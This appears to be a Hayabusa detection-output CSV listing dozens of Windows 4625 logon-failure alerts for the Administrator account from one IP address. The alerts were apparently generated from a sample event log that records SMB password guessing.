2016-09-20 01:50:55.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DiRvofjwoeAdHYrv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.655 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BNLdOrPwbvYELiCc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x15WKTspmg2ALHaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QMoQWddkcYtCmoKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jhTbfX42Pwn7OA2k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yXcbUCgAhVFfqLc3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.856 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GHyXVM0jpaKBiY9N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TZoWEcU6VbEnrLpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.939 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LIfEzNQWwvrai4ga : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DhImfqWz7SHId9hE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.014 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s6sekQfneNE5uFtx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iEQ6KkZEHGcSgdA8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.103 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qzxJYBbM7ZMaaGOo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wO5GFBqSltNfjtQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PdsMzjfP1ZcPju2i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2LqpKmoCX9slPXie : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ouHvw1LXTN3OSFYb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tZIB1QO7hfugceJg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u4QU2BQ0u5tJsdjG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0P7NKiKCmLvu6L1L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4obkK4RfsLZe5gdi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JRUDpDLhgop8d1el : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LvdsNkFqfFWRePXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5wvd8c1jYrEZMcKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AWvECxgkvWdg9Zdc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lHHPOAYSMSp3BhX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rJicXUMfrx9BOzHI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eybrQWvrvwSkNADJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VVMPCaQB0XteDSwC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lbjjLoATZE6KPIQv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tips954DRcYeIB2T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nLe9aMiMz0akxfWW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: csroGB9KZOZkb5sY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Zl4Rc25RsvJ7Y9H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C5CxqCFOIJBMZCD6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gVPwxpR05F3B5aXp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nP317UkK2DhTD5Rd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ir3c7dqXm1LhbfqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1U1QZiJSrEufxF3b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HZnDnDhTPuC9n5A1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72gY1ClzwuisAhKW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nrneLGOZCwPIeQgT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.386 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dm3gGV2yR4B3yrJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fzeklLG1KCTE5FpP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uZPwxCw3EWy9NShk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MalB3OcsOsRaMtS3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XMZMqCYPHO3n4RIh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1VUeIuU1rQPISNA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: md4ioB8wNiaz2EKB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nM8QaFeqwDfJZ1gc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlR75rMhpLnfQZbC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.746 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WF8BcOe4YUDYTXkj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FK0Iiao20PyPmtTk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kQbCbAHrQilFmMZP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.866 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VUdXQOw98VVoksDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fISqpC8eKlaQGabv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s5Y0VryMAHjtB3n2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bsjAHlztFIC8tBt0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CiEQlAlTOhqOKpmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i7lUqZMROQXNUtQm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0eFCGEtOLzjUxI5v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CqfOAGcVcwSgaeo3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2hcqVJzkVgvUnebk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9ZpqiTGXqJlAQTZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.255 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qCzXKlJ2vPeqqdfa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tITW0ihpErFk3nKp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MdQqr1T4frPNlulf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: niiXRpP5AVHpG9Hu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EThR98jZUdwNxbXQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBsJcIw859FfEkLD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.502 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kG4Tv5vauSWhbj8F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 453tjgRGMu46vC33 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1fnzhhfszxJWxLCT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWPkeL8TnAbC1nSV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.659 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JrDmUzyK4Xxx6Jn1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
